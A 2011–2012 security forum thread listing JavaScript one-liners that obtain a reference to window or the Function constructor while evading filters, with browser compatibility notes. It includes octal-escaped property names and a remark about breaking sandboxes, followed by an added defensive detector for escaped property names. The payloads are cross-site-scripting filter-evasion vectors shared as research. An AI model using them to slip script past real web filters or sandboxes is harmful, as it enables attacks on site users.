Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Re: Tricks for getting a reference to window
Posted by: superevr
Date: June 20, 2011 05:09PM

I'm not sure what everyone else is using these tricks for, but I found it to be a great way to evaluate octal strings. I needed some new tricks because our old favorite trick "[],[]['sort']()" is not working in the latest versions of Firefox, and I was also in a situation where a comma was not allowed.


So I grabbed some snippets of code from here and built a few code samples. Anything enclosed in '' can be replaced with its octal equivalent.

'\141\154\145\162\164' = 'alert'


$['__parent__']['alert'](1) //Firebug Console in FF3.6 Only
(0,[]['sort'])()['alert'](1) //FF3.6, Chrome, IE9
1.['__parent__']['alert'](1) //FF3.6
([],[]['sort'])()['alert'](1) //Chrome, FF3.6, IE9
/_/['__parent__']['alert'](1) //FF3.6
$['constructor']('alert(1)')() //JQuery Chrome, IE8, IE9, FF4, FF3.6
(0,[]['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0,{}['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0||$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1&&$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1?$['valueOf']:0)()['alert'](1) //Jquery Chrome, IE9
[]['sort']['apply']()['alert'](1) //Chrome, FF3.6
(0,/0/(/0/)['sort'])()['alert'](1) //Chrome, FF3.6
('',/\//['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
(1?['']['valueOf']:0)()['alert'](1) //Chrome, IE9
''['big']['constructor']('alert(1)')() //FF4, FF3.6 IE8, IE9, Webkit
[]['map']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE9
(1&&[]['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
/_/['test']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE8, IE9
(0||['']['valueOf'])()['alert'](1) //FF3.6, IE9, Chrome
(0.['valueOf'])['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
1.['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
(0)['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
$='@mozilla.org/js/function';$::['alert'](1) //FF3.6, FF4

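Added example, not part of the original post or thread: a filter that matches these property names as literal text misses the octal form, so a detector has to decode string-literal escapes before comparing. The sketch below does that for bracket-notation accesses; it also covers hex and \uXXXX escapes, which goes beyond the octal case in the post. The function names, the SENSITIVE list and the sample inputs are assumptions made for this illustration.

```javascript
// Property names taken from the snippets in the post (assumption: tune per application).
const SENSITIVE = new Set(['alert', 'constructor', '__parent__', 'valueOf', 'sort', 'apply', 'window']);

// Decode octal (\141), hex (\x61) and unicode (\u0061) escapes as a JavaScript
// string literal would. Other escapes (\\, \', \n ...) are consumed but left as
// written, so an escaped backslash followed by digits is not read as octal.
function decodeJsEscapes(body) {
  const re = /\\(?:([0-3][0-7]{0,2}|[4-7][0-7]?)|x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|[\s\S])/g;
  return body.replace(re, (m, oct, hex, uni) => {
    if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
    const h = hex !== undefined ? hex : uni;
    return h !== undefined ? String.fromCharCode(parseInt(h, 16)) : m;
  });
}

// Find ['...'] / ["..."] property accesses and report those whose decoded name is sensitive.
function findBracketAccess(input) {
  const re = /\[\s*(['"])((?:\\[\s\S]|(?!\1)[^\\])*)\1\s*\]/g;
  const findings = [];
  for (const m of input.matchAll(re)) {
    const decoded = decodeJsEscapes(m[2]);
    if (SENSITIVE.has(decoded)) {
      findings.push({ raw: m[2], decoded, obfuscated: decoded !== m[2] });
    }
  }
  return findings;
}

// Constructed sample inputs (for example, values seen in a request parameter or log line).
const SAMPLES = [
  "(0,[]['sort'])()['\\141\\154\\145\\162\\164'](1)", // snippet from the post with 'alert' in octal
  "[]['map']['\\x63onstructor']('alert(1)')()",       // hex escape, a generalization
  "items['name'] = rows[0]['title']",                 // ordinary code, no finding expected
];

for (const s of SAMPLES) {
  console.log(s, '=>', JSON.stringify(findBracketAccess(s)));
}
```

The obfuscated flag separates names written in the clear from names that only appear after decoding, which is usually the more useful signal since ordinary code rarely escapes a property name.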
Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 21, 2011 01:11PM

Good for breaking sandboxes too

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Tricks for getting a reference to window (rev 16)
Date: May 18, 2012 01:27AM

RuntimeObject("w*")["window"]["alert"](1); // IE

http://d.hatena.ne.jp/st4rdust/20120518/1337319251

--
Yosuke HASEGAWA
http://utf-8.jp/
